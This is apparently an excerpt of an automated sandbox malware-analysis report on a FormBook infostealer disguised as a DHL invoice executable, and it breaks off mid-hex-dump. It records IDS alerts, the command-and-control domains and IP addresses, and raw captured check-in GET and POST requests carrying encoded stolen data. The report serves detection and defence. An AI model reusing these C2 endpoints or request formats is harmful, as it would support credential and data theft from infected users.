            Source: Binary string: wntdll.pdbUGP source: csc.exe, 00000004.00000003.1984836157.00000000053B5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000004.00000003.1986270313.0000000005569000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000004.00000002.2075036679.00000000058AE000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.2076822878.0000000004230000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.2078180097.00000000043E1000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Configuration.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Core.pdbH source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Xml.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8DF000.00000004.00000020.00020000.00000000.sdmp, dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C840000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.PDB" source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1846210334.000000F06B1F3000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Management.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Drawing.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Management.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Core.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbiX source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8DF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER21A5.tmp.dmp.7.dr
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0041C2A0 FindFirstFileW,FindNextFileW,FindClose,13_2_0041C2A0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 4x nop then xor eax, eax13_2_00409B80
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 4x nop then pop edi13_2_0040DE61
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 4x nop then mov ebx, 00000004h13_2_048E04E8

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49838 -> 64.225.91.73:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49742 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49807 -> 64.225.91.73:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49792 -> 64.225.91.73:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49822 -> 64.225.91.73:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49869 -> 209.74.64.187:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49915 -> 209.74.64.187:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49900 -> 209.74.64.187:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49884 -> 209.74.64.187:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 98.124.224.17:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 67.223.117.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50001 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49989 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50040 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50036 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50020 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50024 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 98.124.224.17:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50028 -> 98.124.224.17:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50051 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50052 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50048 -> 172.217.18.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 67.223.117.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 172.217.18.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50057 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 67.223.117.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50044 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50059 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50056 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50055 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 98.124.224.17:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50032 -> 67.223.117.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 172.217.18.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 172.217.18.19:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.booosted.xyz
            Source: Joe Sandbox ViewIP Address: 64.225.91.73 64.225.91.73
            Source: Joe Sandbox ViewIP Address: 209.74.64.187 209.74.64.187
            Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
            Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /veiq/?gvyXe=EtxTw6OpYVppMB&Y8i=ZaCIZuFl7wZEptGr8oGQP+xb0A/J37Yq6QCg9bOCsWn91ieeFGXGB3UxVSoIIHFs/R2ofeQV0TveU8WhT6zXata70k2wUe2St57OOyVKg7CHUyAKXe1z7Nw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.arcare.partnersConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /zhgj/?Y8i=JdcPiMMO58hRVijVJpirz9/V5cix6+KSp2WZxXJhOFhYalpiiMnN1LFcUFae4/RxJfLAk2h1IoFKP2Vwx+6Zjf+Qzw/S6pq9Hcy8Rpyilffl6Uu+pL95yEg=&gvyXe=EtxTw6OpYVppMB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bejho.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /ohf8/?gvyXe=EtxTw6OpYVppMB&Y8i=ll5dDbshsmxjCV2Jki1rRe0WTYojaPmnmIrEqeX5AC+cgPBA3oVXvxxUo0hOqHqzs3EuIGVBpbOb4OwgMNYqD9wq62ogBAVACXMNGlc+5YxBk1nmOhOQVvg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.jagdud.storeConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /0bvv/?gvyXe=EtxTw6OpYVppMB&Y8i=LsZlfLJLVWn36+29SrbHwZ4luzPZC8QC5ghK6sSKdTzC3J+tSarGA1FPkRmoEIfFSAMLZ+GzwFna9SDLC9K8A7K2msKq/CeIb1Pmlq+zJ/M9UWL1f9QpmJ4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.nieuws-july202541.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /d22y/?Y8i=dxLCwHEd799e6zKzvZNVLcz/EcQwMQKXxfRDzHSBACKu35rXWSMWvF6m2/zFPWSnOOS4JYjJIrjoqVx5R3nGQB+J6unEzU7Qg/zyG7VApaoWeyOXFK3Agjg=&gvyXe=EtxTw6OpYVppMB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bandukchi.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /9kvp/?Y8i=irFuJh4j2fCN/xdLIJkju+0Ww/aOPRv0cSVSUNzcrQBJ8yd3G+0Gay8rhpLSBKnoinj5jjn5ajFjqPJaFJwFxtDWOxi5ujV2lXqfQRwRqrJQ238DxciUY6U=&gvyXe=EtxTw6OpYVppMB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.gcast.videoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /e61w/?Y8i=avqVMth+cNQRkZY2K2P4TQnPCfJBRHrYtZ8WRp4GnmfHlpA3lZroTpAoo3xn6sOeWVk5VUrnhZ7C94/2/OFxplk4lAdpGXqEZWiDVUw5kH/U8gSaCEqLMGU=&gvyXe=EtxTw6OpYVppMB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.rtpsilva4d.clickConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /37uf/?gvyXe=EtxTw6OpYVppMB&Y8i=ZqyRn0tKBl8eeDqDLfkB30WUCggn+8okKolBQQUOnigkga9xaBFfdezim29wA1t+01108B0pmPLbZAIUtL3722PCxl5Rmd8Hzuf5Mxa3n4hY0LoX5BPpi6c= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bearableguy.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /kgqw/?Y8i=++51ydVD2Go1KxhaP3MVo0+h3G0aMK8VVopxxXyVivx076J57lFiLJq/o16RBKp5kNk8000HSHMzLW5tY9vsaI/mDiKsTd/UPoZk72+lh+5I9xFVF6w9VAA=&gvyXe=EtxTw6OpYVppMB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.funddata-x.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /5hlj/?gvyXe=EtxTw6OpYVppMB&Y8i=ZhDBEtFYcGNGcrgAAGaz4cmus4dxP105ym1b2z3b9xiYRPvGfE1I1cavQEWdGxySW1feFGHJVCpL7BE/D8kUvY9bRjJzxQ8BntPjPcySUs7sgICsU/uMV8Q= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.s9gzg9.vipConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /wlyv/?Y8i=IuREpM7aSitXKjuhE/mFHFDVwD2eRLCYNRFeU3oJFmzodDyLIPB9Z9kG2f5hKEjWCIf9aFQVH3NuQ6OQSrT4GxlP+w8Yb3pAn7KQBwnL39T0VCYIbwJiho8=&gvyXe=EtxTw6OpYVppMB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.oneid.inkConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /ikn1/?gvyXe=EtxTw6OpYVppMB&Y8i=lK8QPaLm/zhKqJMYNE2sX5D70ErSQQuPCqsI86u1e/xCs+G60RywLXCNnEZxAwXF4d4PTI/6YISBOu+SCh07N1ax9JYA7qzNxjbZ37nRHq3jIobn9Z81aSM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.extrem.techConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /8hrm/?Y8i=/8yNM9wGzpX2p7Gr9OMs8k3Lkit8nMI9nKTTJBalfkMfH6xzxaryHaqGqaSFmjBUY2ej3x2hRFvFhHVuCPrBPiINYkfJGOYYxyYlLdiiR95oU5gTTm7ij0A=&gvyXe=EtxTw6OpYVppMB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.everyone.golfConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficDNS traffic detected: DNS query: www.arcare.partners
            Source: global trafficDNS traffic detected: DNS query: www.bejho.net
            Source: global trafficDNS traffic detected: DNS query: www.jagdud.store
            Source: global trafficDNS traffic detected: DNS query: www.dagoovis.org
            Source: global trafficDNS traffic detected: DNS query: www.nieuws-july202541.sbs
            Source: global trafficDNS traffic detected: DNS query: www.bandukchi.com
            Source: global trafficDNS traffic detected: DNS query: www.gcast.video
            Source: global trafficDNS traffic detected: DNS query: www.rtpsilva4d.click
            Source: global trafficDNS traffic detected: DNS query: www.bearableguy.net
            Source: global trafficDNS traffic detected: DNS query: www.funddata-x.net
            Source: global trafficDNS traffic detected: DNS query: www.s9gzg9.vip
            Source: global trafficDNS traffic detected: DNS query: www.oneid.ink
            Source: global trafficDNS traffic detected: DNS query: www.extrem.tech
            Source: global trafficDNS traffic detected: DNS query: www.everyone.golf
            Source: global trafficDNS traffic detected: DNS query: www.booosted.xyz
            Source: unknownHTTP traffic detected: POST /zhgj/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflate, brHost: www.bejho.netOrigin: http://www.bejho.netReferer: http://www.bejho.net/zhgj/Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeContent-Length: 200User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2Data Raw: 59 38 69 3d 45 66 30 76 68 35 77 73 31 65 4a 51 54 68 2f 36 42 71 32 5a 78 4f 54 36 39 2f 79 63 6c 75 57 2f 2b 32 43 49 6b 41 31 51 42 79 70 79 4d 67 42 55 34 39 69 2b 33 66 59 46 5a 52 61 33 39 49 46 75 51 4a 44 35 74 57 6c 56 41 5a 70 2b 49 48 41 6c 78 6f 76 37 32 38 36 43 32 43 53 42 76 36 58 31 45 65 76 6d 61 4f 79 6e 70 4d 50 39 71 33 47 69 2f 5a 56 72 38 55 76 74 38 67 51 48 31 61 6e 44 66 43 44 76 68 50 56 41 66 52 75 59 71 35 47 44 46 30 43 66 36 6a 78 6a 7a 31 2f 52 73 4e 41 72 39 42 59 50 6f 70 6b 65 6b 6f 51 53 67 79 35 64 59 4b 76 7a 75 48 6a 68 65 4b 32 2f 49 61 79 7a 65 67 3d 3d Data Ascii: Y8i=Ef0vh5ws1eJQTh/6Bq2ZxOT69/ycluW/+2CIkA1QBypyMgBU49i+3fYFZRa39IFuQJD5tWlVAZp+IHAlxov7286C2CSBv6X1EevmaOynpMP9q3Gi/ZVr8Uvt8gQH1anDfCDvhPVAfRuYq5GDF0Cf6jxjz1/RsNAr9BYPopkekoQSgy5dYKvzuHjheK2/Iayzeg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 17 Nov 2024 07:36:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 17 Nov 2024 07:36:26 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 